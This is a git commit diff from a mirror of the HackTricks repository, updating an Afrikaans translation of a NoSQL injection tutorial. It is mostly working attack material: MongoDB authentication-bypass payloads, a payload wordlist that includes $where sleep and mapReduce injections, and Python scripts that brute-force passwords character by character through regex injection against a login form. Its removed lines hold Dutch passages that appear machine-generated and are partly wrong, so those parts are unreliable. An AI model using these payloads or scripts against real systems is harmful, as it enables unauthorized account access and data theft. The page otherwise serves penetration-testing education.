mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 12:43:23 +00:00
Translated ['pentesting-web/nosql-injection.md'] to af
This commit is contained in:
parent
cd3cb10488
commit
7a29588fd4
1 changed files with 30 additions and 207 deletions
|
@ -1,9 +1,10 @@
|
|||
# NoSQL-inspuiting
|
||||
# NoSQL inspuiting
|
||||
|
||||
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomaties werkstrome te bou wat aangedryf word deur die wêreld se mees gevorderde gemeenskapsinstrumente.\
|
||||
Kry vandag toegang:
|
||||
\
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik te bou en **outomatiseer werkstrome** aangedryf deur die wêreld se **mees gevorderde** gemeenskaplike gereedskap.\
|
||||
Kry Toegang Vandag:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
|
@ -13,20 +14,20 @@ Kry vandag toegang:
|
|||
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
## Uitbuiting
|
||||
|
||||
In PHP kan jy 'n Array stuur deur die gestuurde parameter te verander van _parameter=foo_ na _parameter\[arrName]=foo._
|
||||
In PHP kan jy 'n Array stuur deur die gestuurde parameter te verander van _parameter=foo_ na _parameter\[arrNaam]=foo._
|
||||
|
||||
Die uitbuitings is gebaseer op die byvoeging van 'n **Operator**:
|
||||
Die uitbuitings is gebaseer op die byvoeging van 'n **Operateur**:
|
||||
```bash
|
||||
username[$ne]=1$password[$ne]=1 #<Not Equals>
|
||||
username[$regex]=^adm$password[$ne]=1 #Check a <regular expression>, could be used to brute-force a parameter
|
||||
|
@ -39,7 +40,7 @@ username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non
|
|||
```
|
||||
### Basiese verifikasie omseil
|
||||
|
||||
**Deur nie-gelyk ($ne) of groter ($gt) te gebruik**
|
||||
**Deur nie gelyk ($ne) of groter ($gt) te gebruik**
|
||||
```bash
|
||||
#in URL
|
||||
username[$ne]=toto&password[$ne]=toto
|
||||
|
@ -51,112 +52,26 @@ username[$exists]=true&password[$exists]=true
|
|||
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
|
||||
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
|
||||
```
|
||||
### **SQL - Mongo**
|
||||
### **SQL - Mongo**
|
||||
|
||||
#### **NoSQL-injectie**
|
||||
#### **NoSQL Injection**
|
||||
|
||||
NoSQL-injectie is een kwetsbaarheid die optreedt wanneer een applicatie onvoldoende beveiliging heeft tegen ongewenste invoer in NoSQL-query's. Dit kan leiden tot het lekken van gevoelige informatie, het wijzigen van gegevens of zelfs het uitvoeren van schadelijke opdrachten.
|
||||
|
||||
#### **Soorten NoSQL-injectie**
|
||||
|
||||
1. **Inferentiële NoSQL-injectie**: Dit treedt op wanneer een aanvaller informatie kan afleiden door de reactie van de database te analyseren. Dit kan worden gebruikt om gevoelige gegevens zoals wachtwoorden of gebruikersnamen te achterhalen.
|
||||
|
||||
2. **Time-based NoSQL-injectie**: Dit is vergelijkbaar met inferentiële NoSQL-injectie, maar in plaats van de reactie te analyseren, maakt de aanvaller gebruik van vertragingen in de reactie van de database om informatie te achterhalen.
|
||||
|
||||
3. **Boolean-based NoSQL-injectie**: Dit treedt op wanneer een aanvaller de waarheidswaarde van een voorwaarde kan beïnvloeden om informatie te achterhalen.
|
||||
|
||||
#### **Voorbeelden van NoSQL-injectie**
|
||||
|
||||
Hier zijn enkele voorbeelden van NoSQL-injectie in MongoDB:
|
||||
|
||||
1. **Inferentiële NoSQL-injectie**: Stel dat een applicatie een gebruikersnaam en wachtwoord vereist om in te loggen. Als de applicatie geen juiste validatie uitvoert, kan een aanvaller een gebruikersnaam invoeren zoals `admin'--` om toegang te krijgen tot het admin-account zonder het juiste wachtwoord.
|
||||
|
||||
2. **Time-based NoSQL-injectie**: Een aanvaller kan een vertraging in de reactie van de database veroorzaken door een query te manipuleren. Door de reactietijd te analyseren, kan de aanvaller gevoelige informatie achterhalen.
|
||||
|
||||
3. **Boolean-based NoSQL-injectie**: Een aanvaller kan de waarheidswaarde van een voorwaarde beïnvloeden door specifieke invoer te gebruiken. Hierdoor kan de aanvaller informatie achterhalen die normaal gesproken niet toegankelijk zou zijn.
|
||||
|
||||
#### **Preventie van NoSQL-injectie**
|
||||
|
||||
Om NoSQL-injectie te voorkomen, moeten ontwikkelaars de volgende maatregelen nemen:
|
||||
|
||||
1. **Inputvalidatie**: Zorg ervoor dat alle invoer correct wordt gevalideerd en gesanitized voordat deze wordt gebruikt in een query.
|
||||
|
||||
2. **Parameterisatie**: Gebruik parameterisatie om query's op te bouwen in plaats van invoer rechtstreeks in de query op te nemen.
|
||||
|
||||
3. **Minimale rechten**: Geef de databasegebruiker alleen de minimale rechten die nodig zijn om de applicatie uit te voeren.
|
||||
|
||||
4. **Beperk blootstelling**: Beperk de blootstelling van de database aan het internet en gebruik firewalls om ongeautoriseerde toegang te voorkomen.
|
||||
|
||||
#### **Samenvatting**
|
||||
|
||||
NoSQL-injectie is een ernstige kwetsbaarheid die kan leiden tot het lekken van gevoelige informatie en het compromitteren van een systeem. Het is belangrijk voor ontwikkelaars om de juiste beveiligingsmaatregelen te nemen om NoSQL-injectie te voorkomen, zoals inputvalidatie, parameterisatie en het beperken van blootstelling aan de database.
|
||||
NoSQL-injectie is een type aanval dat gericht is op NoSQL-databases, zoals MongoDB. Net als SQL-injectie kunnen aanvallers kwaadaardige code invoegen om gegevens te stelen, wijzigen of verwijderen. Het is belangrijk om invoervalidatie en parameterisatie toe te passen om NoSQL-injectie te voorkomen.
|
||||
```javascript
|
||||
query = { $where: `this.username == '${username}'` }
|
||||
```
|
||||
'n Aanvaller kan dit uitbuit deur strings soos `admin' || 'a'=='a` in te voer, wat die navraag laat terugkeer deur die voorwaarde te bevredig met 'n tautologie (`'a'=='a'`). Dit is analoog aan SQL-injeksie-aanvalle waar insette soos `' of 1=1-- -` gebruik word om SQL-navrae te manipuleer. In MongoDB kan soortgelyke inspuitings gedoen word deur insette soos `' || 1==1//`, `' || 1==1%00`, of `admin' || 'a'=='a` te gebruik.
|
||||
'n Aanvaller kan dit uitbuit deur strings soos `admin' || 'a'=='a` in te voer, wat die navraag laat terugkeer deur aan die voorwaarde te voldoen met 'n tautologie (`'a'=='a`). Dit is analogies aan SQL-injeksie aanvalle waar insette soos `' or 1=1-- -` gebruik word om SQL-navrae te manipuleer. In MongoDB kan soortgelyke inspuitings gedoen word deur insette soos `' || 1==1//`, `' || 1==1%00`, of `admin' || 'a'=='a`.
|
||||
```
|
||||
Normal sql: ' or 1=1-- -
|
||||
Mongo sql: ' || 1==1// or ' || 1==1%00 or admin' || 'a'=='a
|
||||
```
|
||||
### Haal **lengte** inligting uit
|
||||
|
||||
Om die lengte van 'n veld in 'n NoSQL-injeksie aanval te bepaal, kan jy die volgende tegniek gebruik:
|
||||
|
||||
1. Kies 'n veld waarvan jy die lengte wil bepaal.
|
||||
2. Voeg die volgende waarde by die veld se waarde: `$ne: null` of `$regex: /.*/`.
|
||||
3. As die lengte van die veld in die antwoord verander het, kan jy aflei dat die NoSQL-injeksie suksesvol was.
|
||||
|
||||
Hier is 'n voorbeeld van hoe jy die lengte van 'n gebruikersnaam in 'n NoSQL-injeksie kan bepaal:
|
||||
|
||||
```plaintext
|
||||
POST /users HTTP/1.1
|
||||
Host: example.com
|
||||
Content-Type: application/json
|
||||
|
||||
{
|
||||
"username": {
|
||||
"$ne": null
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
As die lengte van die gebruikersnaam in die antwoord verander het, kan jy aflei dat die NoSQL-injeksie suksesvol was.
|
||||
```bash
|
||||
username[$ne]=toto&password[$regex]=.{1}
|
||||
username[$ne]=toto&password[$regex]=.{3}
|
||||
# True if the length equals 1,3...
|
||||
```
|
||||
### Haal **data**-inligting uit
|
||||
|
||||
NoSQL-injeksie is 'n aanvalstegniek wat gebruik word om data-inligting uit NoSQL-databasisse te onttrek. Hierdie aanval maak gebruik van swakheid in die manier waarop NoSQL-databasisse navrae verwerk, wat dit moontlik maak vir 'n aanvaller om ongemagtigde toegang tot die data te verkry.
|
||||
|
||||
#### Hoe werk dit?
|
||||
|
||||
NoSQL-databasisse maak gebruik van 'n ander navraagtaal as SQL-databasisse. In plaas van SQL, gebruik NoSQL-databasisse dikwels 'n JSON-gebaseerde navraagtaal. Hierdie navraagtaal maak gebruik van sleutel-waarde-pare om data te stoor en te onttrek.
|
||||
|
||||
NoSQL-injeksie vind plaas wanneer 'n aanvaller 'n kwaadwillige waarde invoer in 'n navraag wat gebruik word om data te onttrek. Hierdie kwaadwillige waarde kan lei tot 'n onverwagte uitvoer van die navraag, wat die aanvaller in staat stel om data te onttrek wat nie bedoel is om geopenbaar te word nie.
|
||||
|
||||
#### Voorbeelde van NoSQL-injeksie
|
||||
|
||||
Hier is 'n paar voorbeelde van hoe NoSQL-injeksie kan plaasvind:
|
||||
|
||||
1. **Ongefilterde invoer**: As die invoer van 'n gebruiker nie behoorlik gefiltreer word nie, kan 'n aanvaller 'n kwaadwillige waarde insluit wat die navraag beïnvloed en toegang tot ongemagtigde data verkry.
|
||||
|
||||
2. **Onvoldoende toetsing**: As die toetsing van die invoer nie streng genoeg is nie, kan 'n aanvaller 'n spesiale waarde insluit wat die navraag manipuleer en toegang tot gevoelige data verkry.
|
||||
|
||||
3. **Swak sessiebestuur**: As die sessiebestuur nie behoorlik geïmplementeer is nie, kan 'n aanvaller 'n spesiale waarde insluit wat die sessie-inligting manipuleer en toegang tot vertroulike data verkry.
|
||||
|
||||
#### Voorkoming van NoSQL-injeksie
|
||||
|
||||
Om NoSQL-injeksie te voorkom, is dit belangrik om behoorlike invoerfitering en toetsing te implementeer. Hier is 'n paar maatreëls wat geneem kan word om NoSQL-injeksie te voorkom:
|
||||
|
||||
1. **Invoerfitering**: Alle gebruikersinvoer moet behoorlik gefiltreer word om potensiële kwaadwillige waardes te verwyder.
|
||||
|
||||
2. **Toetsing**: Die toetsing van gebruikersinvoer moet streng wees en slegs toelaat dat geldige waardes gebruik word in die navrae.
|
||||
|
||||
3. **Sessiebestuur**: Implementeer 'n sterk sessiebestuursbeleid om te verseker dat sessie-inligting nie gemanipuleer kan word deur 'n aanvaller nie.
|
||||
|
||||
Deur hierdie maatreëls te implementeer, kan NoSQL-injeksie-aanvalle voorkom word en kan die veiligheid van NoSQL-databasisse verhoog word.
|
||||
```
|
||||
in URL (if length == 3)
|
||||
username[$ne]=toto&password[$regex]=a.{2}
|
||||
|
@ -175,42 +90,6 @@ in JSON
|
|||
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
|
||||
```
|
||||
### **SQL - Mongo**
|
||||
|
||||
#### **NoSQL-injectie**
|
||||
|
||||
NoSQL-injectie is een kwetsbaarheid die optreedt wanneer een applicatie onvoldoende beveiliging heeft tegen ongewenste invoer in NoSQL-query's. Dit kan leiden tot het lekken van gevoelige informatie, het wijzigen van gegevens of zelfs het uitvoeren van schadelijke opdrachten.
|
||||
|
||||
#### **Soorten NoSQL-injectie**
|
||||
|
||||
1. **Inferentiële NoSQL-injectie**: Dit treedt op wanneer een aanvaller informatie kan afleiden door de reactie van de database te analyseren. Dit kan worden gebruikt om gevoelige gegevens zoals wachtwoorden of gebruikersnamen te achterhalen.
|
||||
|
||||
2. **Time-based NoSQL-injectie**: Dit treedt op wanneer een aanvaller de vertraging in de reactie van de database kan manipuleren om informatie te verkrijgen. Dit kan worden gebruikt om gegevens te extraheren of om de aanval te verbergen.
|
||||
|
||||
3. **Boolean-based NoSQL-injectie**: Dit treedt op wanneer een aanvaller de waarheidswaarde van een query kan manipuleren om informatie te verkrijgen. Dit kan worden gebruikt om gegevens te extraheren of om de aanval te verbergen.
|
||||
|
||||
#### **NoSQL-injectie voorkomen**
|
||||
|
||||
Om NoSQL-injectie te voorkomen, moeten ontwikkelaars de volgende best practices volgen:
|
||||
|
||||
1. **Inputvalidatie**: Zorg ervoor dat alle invoer grondig wordt gevalideerd voordat deze wordt gebruikt in een query. Gebruik bijvoorbeeld reguliere expressies om ervoor te zorgen dat alleen geldige invoer wordt geaccepteerd.
|
||||
|
||||
2. **Parameterbinding**: Gebruik altijd parameterbinding in plaats van het samenvoegen van invoer in query's. Dit helpt bij het voorkomen van injectieaanvallen.
|
||||
|
||||
3. **Minimale rechten**: Geef de databasegebruiker alleen de minimale rechten die nodig zijn om de applicatie uit te voeren. Hierdoor wordt de impact van een succesvolle aanval beperkt.
|
||||
|
||||
4. **Gebruik van ORM-frameworks**: Gebruik Object-Relational Mapping (ORM) -frameworks die automatisch query's genereren op basis van objecten. Deze frameworks bieden vaak ingebouwde beveiligingsmaatregelen tegen injectieaanvallen.
|
||||
|
||||
#### **NoSQL-injectietools**
|
||||
|
||||
Er zijn verschillende tools beschikbaar om NoSQL-injectieaanvallen uit te voeren, zoals:
|
||||
|
||||
- **NoSQLMap**: Een geautomatiseerd pentesting-framework voor het detecteren en exploiteren van NoSQL-injectiekwetsbaarheden.
|
||||
|
||||
- **Mongosniff**: Een hulpmiddel dat netwerkverkeer kan vastleggen en analyseren om NoSQL-injectieaanvallen te detecteren.
|
||||
|
||||
- **NoSQLExploiter**: Een tool die is ontworpen om NoSQL-injectieaanvallen uit te voeren en kwetsbaarheden in MongoDB-databases te identificeren.
|
||||
|
||||
Het is belangrijk om deze tools verantwoordelijk te gebruiken en alleen op systemen te testen waarvoor u toestemming heeft.
|
||||
```
|
||||
/?search=admin' && this.password%00 --> Check if the field password exists
|
||||
/?search=admin' && this.password && this.password.match(/.*/)%00 --> start matching password
|
||||
|
@ -232,7 +111,9 @@ Deur die gebruik van die **$func** operator van die [MongoLite](https://github.c
|
|||
|
||||
### Kry inligting vanaf verskillende versamelings
|
||||
|
||||
Dit is moontlik om [**$lookup**](https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/) te gebruik om inligting vanaf 'n ander versameling te kry. In die volgende voorbeeld lees ons vanaf 'n **ander versameling** genaamd **`users`** en kry die **resultate van al die inskrywings** met 'n wagwoord wat ooreenstem met 'n wild card.
|
||||
Dit is moontlik om [**$lookup**](https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/) te gebruik om inligting vanaf 'n ander versameling te kry. In die volgende voorbeeld lees ons vanaf 'n **verskillende versameling** genaamd **`users`** en kry die **resultate van al die inskrywings** met 'n wagwoord wat ooreenstem met 'n wild card.
|
||||
|
||||
**NOTA:** `$lookup` en ander aggregasiefunksies is slegs beskikbaar as die `aggregate()`-funksie gebruik is om die soektog uit te voer in plaas van die meer algemene `find()` of `findOne()`-funksies.
|
||||
```json
|
||||
[
|
||||
{
|
||||
|
@ -254,14 +135,14 @@ Dit is moontlik om [**$lookup**](https://www.mongodb.com/docs/manual/reference/o
|
|||
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomaties werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\
|
||||
Kry vandag toegang:
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik **werkstrome te bou** en te **outomatiseer** met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
|
||||
Kry Vandaag Toegang:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
## MongoDB Aanvalspakette
|
||||
## MongoDB Aanvalle
|
||||
|
||||
Lys [van hier](https://github.com/cr0hn/nosqlinjection_wordlists/blob/master/mongodb_nosqli.txt)
|
||||
Lys [vanaf hier](https://github.com/cr0hn/nosqlinjection_wordlists/blob/master/mongodb_nosqli.txt)
|
||||
```
|
||||
true, $where: '1 == 1'
|
||||
, $where: '1 == 1'
|
||||
|
@ -291,65 +172,7 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
|
|||
{"username": {"$gt":""}, "password": {"$gt":""}}
|
||||
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
|
||||
```
|
||||
## Blinde NoSQL-skrips
|
||||
|
||||
Hierdie skrips demonstreer 'n blinde NoSQL-injeksie-aanval. Blinde NoSQL-injeksie kom voor wanneer 'n toepassing kwetsbaar is vir NoSQL-injeksie, maar nie die resultate van die aanval direk aan die aanvaller terugstuur nie. In plaas daarvan moet die aanvaller die resultate van die aanval aflei deur te kyk na die gedrag van die toepassing.
|
||||
|
||||
### Skrips
|
||||
|
||||
Die volgende skrips illustreer 'n blinde NoSQL-injeksie-aanval:
|
||||
|
||||
```javascript
|
||||
const request = require('request');
|
||||
|
||||
function makeRequest(payload) {
|
||||
const options = {
|
||||
url: 'http://example.com/api/login',
|
||||
method: 'POST',
|
||||
headers: {
|
||||
'Content-Type': 'application/json'
|
||||
},
|
||||
body: JSON.stringify(payload)
|
||||
};
|
||||
|
||||
request(options, (error, response, body) => {
|
||||
if (error) {
|
||||
console.error(error);
|
||||
} else {
|
||||
console.log(body);
|
||||
}
|
||||
});
|
||||
}
|
||||
|
||||
function login(username, password) {
|
||||
const payload = {
|
||||
username: username,
|
||||
password: password
|
||||
};
|
||||
|
||||
makeRequest(payload);
|
||||
}
|
||||
|
||||
function checkPassword(password) {
|
||||
const regex = new RegExp('^' + password);
|
||||
|
||||
login('admin', { $regex: regex });
|
||||
}
|
||||
|
||||
checkPassword('password');
|
||||
```
|
||||
|
||||
### Verduideliking
|
||||
|
||||
Hier is 'n verduideliking van die skrips:
|
||||
|
||||
1. Die `makeRequest`-funksie maak 'n HTTP-aanvraag na die `/api/login`-roete met die gegee payload.
|
||||
2. Die `login`-funksie roep die `makeRequest`-funksie op met die gebruikersnaam en wagwoord as die payload.
|
||||
3. Die `checkPassword`-funksie gebruik 'n regulêre uitdrukking om die wagwoord te toets. Dit voeg die wagwoord by die begin van die regulêre uitdrukking en gebruik die `$regex`-operateur om te kyk of die wagwoord ooreenstem met die gebruikersnaam van die admin-gebruiker.
|
||||
4. Die `checkPassword`-funksie roep die `login`-funksie op met die gebruikersnaam "admin" en die wagwoord as die regulêre uitdrukking.
|
||||
5. Die `checkPassword`-funksie word opgeroep met die wagwoord "password".
|
||||
|
||||
As die toepassing vatbaar is vir blinde NoSQL-injeksie, sal die aanval die wagwoord "password" suksesvol aflei deur te kyk na die gedrag van die toepassing.
|
||||
## Blinde NoSQL-skrip
|
||||
```python
|
||||
import requests, string
|
||||
|
||||
|
@ -385,9 +208,9 @@ if 'OK' in r.text:
|
|||
print("Found one more char : %s" % (password+c))
|
||||
password += c
|
||||
```
|
||||
### Brute-force login gebruikersname en wagwoorde van POST-aanmelding
|
||||
### Brute-force login gebruikersname en wagwoorde vanaf POST-aanmelding
|
||||
|
||||
Hierdie is 'n eenvoudige skripsie wat jy kan wysig, maar die vorige gereedskap kan ook hierdie taak verrig.
|
||||
Dit is 'n eenvoudige skripsie wat jy kan wysig, maar die vorige gereedskap kan ook hierdie taak verrig.
|
||||
```python
|
||||
import requests
|
||||
import string
|
||||
|
@ -441,22 +264,22 @@ get_password(u)
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en **outomatiese werksvloeie** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
|
||||
Kry vandag toegang:
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik te bou en **outomatiseer werkafvloei** aangedryf deur die wêreld se **mees gevorderde** gemeenskapshulpmiddels.\
|
||||
Kry Vandag Toegang:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
|
Loading…
Reference in a new issue